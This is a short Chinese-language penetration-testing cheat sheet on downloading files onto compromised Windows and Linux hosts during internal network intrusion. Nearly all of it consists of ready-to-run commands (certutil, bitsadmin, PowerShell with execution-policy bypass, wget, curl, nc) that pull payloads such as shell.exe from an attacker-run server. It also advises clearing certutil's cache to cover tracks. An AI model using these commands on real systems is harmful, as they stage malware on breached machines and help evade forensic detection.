内网渗透下载文件
Windows
certutil
不加保存的文件名
certutil -urlcache -split -f http://192.168.66.245:8000/shell.exe
添加需要保存的文件名
certutil -urlcache -split -f http://192.168.66.245:9000/shell.exe test.exe
certutil在下载文件时会在缓存目录保存副本,所以在真实渗透中,需要清理缓存目录
缓存目录为:%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
使用命令直接删除
certutil -urlcache -split -f http://192.168.66.245:9000/shell.exe delete
查看缓存内容
certutil.exe -urlcache *
bitsadmin
只适用于Windows7及以上的系统版本
使用bitsadmin下载文件,指定保存路径与文件名
bitsadmin /rawreturn /transfer getfile http://192.168.66.245/raw.exe C:\Users\mssql\Desktop\asd\cc.exe
bitsadmin /rawreturn /transfer getpayload http://192.168.66.245/raw.exe C:\Users\mssql\Desktop\asd\dd.exe
带进度条
bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.66.245/raw.exe" "C:\Users\mssql\Desktop\asd\ee.exe"
如果下载文件过大,可以提高优先级
bitsadmin /setpriority 比如high
FOREGROUND
HIGH
NORMAL
LOW
PowerShell
Windows7及以上系统默认自带powershell
一句话下载
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.66.245/raw.exe','C:\Users\mssql\Desktop\a.exe')
powershell (new-object Net.WebClient).DownloadFile('http://192.168.66.245/raw.exe','C:\Users\mssql\Desktop\b.exe')
Linux
wget
wget http://192.168.66.245/raw.exe
curl
curl -O http://192.168.66.245/raw.exe
nc
接收端
nc.exe -l -p 9999 > xxxxxx.exe
发送端
nc64.exe 192.168.5.132 9999 < raw.exe